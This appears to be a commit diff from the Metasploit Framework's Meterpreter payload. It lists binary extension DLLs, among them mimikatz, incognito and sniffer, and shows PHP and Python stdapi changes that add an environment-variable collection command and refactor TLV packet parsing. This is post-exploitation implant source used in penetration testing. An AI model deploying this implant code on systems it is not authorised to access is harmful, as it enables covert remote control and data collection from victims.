data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_networkpug.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.lso
View File

Binary file not shown.

173
data/meterpreter/ext_server_stdapi.php
View File

@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
define("TLV_TYPE_ARCHITECTURE", TLV_META_TYPE_STRING | 1043);
define("TLV_TYPE_LANG_SYSTEM", TLV_META_TYPE_STRING | 1044);
# Environment
define("TLV_TYPE_ENV_VARIABLE", TLV_META_TYPE_STRING | 1100);
define("TLV_TYPE_ENV_VALUE", TLV_META_TYPE_STRING | 1101);
define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102);
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000);
# eval'd twice
my_print("Evaling stdapi");
##
##
# Search Helpers
##
@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048);
*/
if (!function_exists('safe_glob')) {
function safe_glob($pattern, $flags=0) {
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
}
}
/**
@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) {
*/
if (!function_exists('fnmatch')) {
function fnmatch($pattern, $string) {
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
}
}
@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) {
else
$array[$key] = $string.$element;
return $array;
}
}
@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
return ERROR_SUCCESS;
}
@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
return ERROR_SUCCESS;
}
@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) {
}
}
if (!function_exists('stdapi_sys_config_getenv')) {
register_command('stdapi_sys_config_getenv');
function stdapi_sys_config_getenv($req, &$pkt) {
my_print("doing getenv");
$variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE);
# If we decide some day to have sys.config.getenv return all env
# vars when given an empty search list, this is one way to do it.
#if (empty($variable_tlvs)) {
# # We don't have a var to look up, return all of 'em
# $variables = array_keys($_SERVER);
#} else {
# $variables = array();
# foreach ($variable_tlvs as $tlv) {
# array_push($variables, $tlv['value']);
# }
#}
foreach ($variable_tlvs as $name) {
$canonical_name = str_replace(array("$","%"), "", $name['value']);
$env = getenv($canonical_name);
if ($env !== FALSE) {
$grp = "";
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name));
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp));
}
}
return ERROR_SUCCESS;
}
}
# Unimplemented becuase it's unimplementable
#if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self');
@ -696,24 +739,24 @@ function close_process($proc) {
foreach ($proc['pipes'] as $f) {
@fclose($f);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) {
unset($channel_process_map[$proc['cid']]);
}

259
data/meterpreter/ext_server_stdapi.py
View File

@ -86,170 +86,185 @@ TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
##
# General
##
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
##
# Fs
##
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
##
# Net
##
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
##
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
##
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
##
# Registry
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
# Config
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
# Environment
##
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101
TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102
DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
##
# Process
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
##
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
##
# Ui
##
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
##
# Event Log
##
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
##
# Power
##
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
##
# Sys
@ -367,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getenv(request, response):
for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
pgroup = ''
env_var = env_var['value'].translate(None, '%$')
env_val = os.environ.get(env_var)
if env_val:
pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_sysinfo(request, response):
uname_info = platform.uname()

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

64
data/meterpreter/meterpreter.php
View File

@ -680,6 +680,30 @@ function tlv_pack($tlv) {
return $ret;
}
function tlv_unpack($raw_tlv) {
$tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8));
$type = $tlv['type'];
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", $raw_tlv);
$tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
function packet_add_tlv(&$pkt, $tlv) {
$pkt .= tlv_pack($tlv);
}
@ -689,27 +713,10 @@ function packet_get_tlv($pkt, $type) {
# Start at offset 8 to skip past the packet header
$offset = 8;
while ($offset < strlen($pkt)) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
$tlv = tlv_unpack(substr($pkt, $offset));
#my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
#my_print("Found one at offset $offset");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
